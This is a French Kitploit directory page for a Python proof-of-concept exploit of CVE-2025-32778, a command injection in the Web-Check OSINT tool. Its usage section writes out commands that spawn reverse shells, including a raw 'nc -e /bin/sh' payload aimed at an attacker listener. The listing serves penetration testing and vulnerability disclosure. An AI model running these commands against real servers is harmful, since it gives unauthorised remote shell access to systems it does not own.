Skip to content
KitploitKITPLOIT
OutilsBlog
Log in
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-32778 — Exploit PoC pour CVE-2025-32778 : injection de commande dans l'outil OSINT Web-Check | Kitploit
Outils/GitHubGitHub/00xcanelo/cve-2025-32778
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionCommandement et Contrôle
GitHub00xcanelo/cve-2025-32778

CVE-2025-32778

Exploit PoC pour CVE-2025-32778 : injection de commande dans l'outil OSINT Web-Check

Voir le dépôt
3157il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-32778 - Exploitation d'injection de commandes Web-Check

Critical Language: Python

Description

CVE-2025-32778 est une vulnérabilité critique d'injection de commandes dans l'outil OSINT Web-Check de Lissy93.
Elle permet à des attaquants non authentifiés d'exécuter des commandes système arbitraires via le paramètre url dans l'API de capture d'écran.

Ce script Python automatise l'exploitation et peut générer des shells inversés ou accepter des charges utiles personnalisées.


Avertissement

  • Testez uniquement sur des systèmes que vous possédez ou pour lesquels vous êtes autorisé à tester.
  • Toute utilisation non autorisée est illégale et contraire à l'éthique.

Fonctionnalités

  • Exploite l'injection de commande url dans Web-Check.
  • Prend en charge :
    • Shell inversé avec --lhost et --lport.
    • Shell personnalisé via --shell.
  • Normalisation d'URL.
  • Empêche la combinaison de --shell avec --lhost/--lport.

Prérequis

  • Python 3.x
  • Bibliothèque Requests :
pip install requests

Utilisation

git clone https://github.com/00xCanelo/CVE-2025-32778
cd CVE-2025-32778

Générer un shell inversé avec l'outil

python3 cve-2025-32778.py -u http://cible.com:3001/api/screenshot/ --lhost 10.10.10.1 --lport 4444

Charge utile de shell personnalisée (brute)

python3 cve-2025-32778.py -u http://cible.com:3001/api/screenshot/ --shell "nc -e /bin/sh 10.10.10.1 4444"

Menu d'aide

python3 cve-2025-32778.py -h

Comment ça fonctionne

  1. Normalise l'URL cible en scheme://host[:port].

  2. Prépare la charge utile :

    • Génère un shell inversé en utilisant --lhost et --lport.
    • Ou utilise une commande shell brute avec --shell.
  3. Encode la charge utile du shell pour une injection sécurisée dans l'URL.

  4. Envoie une requête HTTP GET vers /api/screenshot/ avec la charge utile.

  5. Attend la connexion du shell inversé.


🧑‍💻 Auteur

00xCanelo
Profil GitHub


Références

  • Dépôt GitHub Web-Check – Projet original contenant le code vulnérable.
  • CVE-2025-32778 – Entrée CVE décrivant la vulnérabilité d'injection de commandes.
Télécharger l’outil